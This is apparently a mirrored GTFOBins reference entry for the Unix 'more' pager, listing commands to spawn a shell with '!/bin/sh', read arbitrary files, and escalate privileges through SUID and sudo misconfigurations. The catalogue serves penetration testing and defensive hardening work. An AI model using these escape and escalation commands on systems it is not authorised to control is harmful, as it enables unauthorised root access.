mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
16 lines
253 B
Markdown
16 lines
253 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
TERM= more /etc/profile
|
|
!/bin/sh
|
|
file-read:
|
|
- code: more file_to_read
|
|
suid:
|
|
- code: ./more file_to_read
|
|
sudo:
|
|
- code: |
|
|
TERM= sudo -E more /etc/profile
|
|
!/bin/sh
|
|
---
|